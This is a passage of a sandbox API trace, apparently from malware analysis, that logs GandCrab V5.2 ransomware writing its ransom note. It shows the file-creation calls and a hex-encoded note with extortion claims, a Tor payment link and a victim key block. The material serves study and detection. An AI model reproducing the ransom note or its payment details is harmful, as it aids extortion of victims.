[0096.932] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.932] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0096.932] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.933] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.934] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\Start Menu\\\\TITWMVJL-DECRYPT.txt") returned 49 [0096.934] CreateFileW (lpFileName="C:\\Users\\Default\\Start Menu\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\default\\start menu\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0096.935] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0096.935] WriteFile (in: hFile=0x230, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f508, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f508*=0x2162, lpOverlapped=0x0) returned 1 [0096.935] CloseHandle (hObject=0x230) returned 1 [0096.936] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.936] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.936] GetSystemTime (in: 